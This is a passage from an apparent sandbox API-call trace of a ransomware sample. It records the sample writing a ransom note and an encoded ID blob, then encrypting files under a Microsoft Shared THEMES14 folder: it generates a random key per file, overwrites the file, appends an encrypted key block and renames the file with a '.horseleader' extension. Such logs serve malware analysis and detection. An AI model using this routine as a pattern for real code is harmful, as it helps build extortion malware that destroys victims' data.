our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.393] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.395] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.395] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.395] CloseHandle (hObject=0x158) returned 1 [0246.395] GetProcessHeap () returned 0x780000 [0246.395] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.395] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c50cb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="CASCADE", cAlternateFileName="")) returned 1 [0246.395] lstrcmpiW (lpString1="CASCADE", lpString2="Windows") returned -1 [0246.395] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE") returned 67 [0246.395] lstrcmpW (lpString1="CASCADE", lpString2=".") returned 1 [0246.396] lstrcmpW (lpString1="CASCADE", lpString2="..") returned 1 [0246.396] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.396] GetProcessHeap () returned 0x780000 [0246.396] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.396] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\*") returned 69 [0246.396] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c50cb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.417] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.417] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\.") returned 69 [0246.417] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.417] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c50cb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.418] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.418] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\..") returned 70 [0246.418] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.418] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.418] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xede9bc00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51c50cb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xede9bc00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xba44, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="CASCADE.ELM", cAlternateFileName="")) returned 1 [0246.418] lstrcmpiW (lpString1="CASCADE.ELM", lpString2="Windows") returned -1 [0246.418] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM") returned 79 [0246.418] StrStrIW (lpFirst="CASCADE.ELM", lpSrch=".horseleader") returned 0x0 [0246.418] lstrcmpW (lpString1="CASCADE.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.419] lstrcmpW (lpString1="CASCADE.ELM", lpString2="_uninstalling_.png") returned 1 [0246.419] lstrlenW (lpString=".testttjffg") returned 11 [0246.419] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM", lpSrch=".testttjffg") returned 0x0 [0246.419] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.419] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.419] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\cascade.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.420] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM") returned 79 [0246.420] StrStrW (lpFirst="CASCADE.ELM", lpSrch=".txt") returned 0x0 [0246.420] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=47684) returned 1 [0246.420] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.423] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.424] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.425] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.425] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.425] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.425] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1a44, lpOverlapped=0x0) returned 1 [0246.426] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe5bc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.426] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1a44, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1a44, lpOverlapped=0x0) returned 1 [0246.426] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.426] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.426] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.426] CloseHandle (hObject=0x1a4) returned 1 [0246.427] GetProcessHeap () returned 0x780000 [0246.427] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.427] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM.horseleader") returned 91 [0246.427] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\cascade.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\cascade.elm.horseleader")) returned 1 [0246.428] GetProcessHeap () returned 0x780000 [0246.428] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.429] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x51c50cb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x262, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="CASCADE.INF", cAlternateFileName="")) returned 1 [0246.429] lstrcmpiW (lpString1="CASCADE.INF", lpString2="Windows") returned -1 [0246.429] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.INF") returned 79 [0246.429] StrStrIW (lpFirst="CASCADE.INF", lpSrch=".horseleader") returned 0x0 [0246.429] lstrcmpW (lpString1="CASCADE.INF", lpString2="#Decrypt#.txt") returned 1 [0246.429] lstrcmpW (lpString1="CASCADE.INF", lpString2="_uninstalling_.png") returned 1 [0246.429] lstrlenW (lpString=".testttjffg") returned 11 [0246.429] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.INF", lpSrch=".testttjffg") returned 0x0 [0246.429] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.429] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.429] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\cascade.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.430] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.INF") returned 79 [0246.430] StrStrW (lpFirst="CASCADE.INF", lpSrch=".txt") returned 0x0 [0246.430] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=610) returned 1 [0246.430] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x262, lpOverlapped=0x0) returned 1 [0246.432] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffd9e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.432] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x262, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x262, lpOverlapped=0x0) returned 1 [0246.432] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.432] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.432] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.433] CloseHandle (hObject=0x1a4) returned 1 [0246.433] GetProcessHeap () returned 0x780000 [0246.433] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.433] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.INF.horseleader") returned 91 [0246.433] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\cascade.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\cascade.inf.horseleader")) returned 1 [0246.437] GetProcessHeap () returned 0x780000 [0246.437] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.437] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x553, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.437] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.437] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 79 [0246.437] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.437] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.437] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.437] lstrlenW (lpString=".testttjffg") returned 11 [0246.437] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.438] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.438] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.438] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.438] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 79 [0246.438] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.439] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1363) returned 1 [0246.439] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x553, lpOverlapped=0x0) returned 1 [0246.441] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffaad, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.441] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x553, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x553, lpOverlapped=0x0) returned 1 [0246.441] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.442] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.442] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.442] CloseHandle (hObject=0x1a4) returned 1 [0246.442] GetProcessHeap () returned 0x780000 [0246.442] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.442] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.horseleader") returned 91 [0246.442] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif.horseleader")) returned 1 [0246.443] GetProcessHeap () returned 0x780000 [0246.443] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.443] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4f93, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.443] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.443] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 80 [0246.444] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.444] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.444] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.444] lstrlenW (lpString=".testttjffg") returned 11 [0246.444] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.444] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.444] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.444] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.445] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 80 [0246.445] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.445] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=20371) returned 1 [0246.445] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4f93, lpOverlapped=0x0) returned 1 [0246.448] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb06d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.448] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4f93, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4f93, lpOverlapped=0x0) returned 1 [0246.448] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.448] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.448] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: 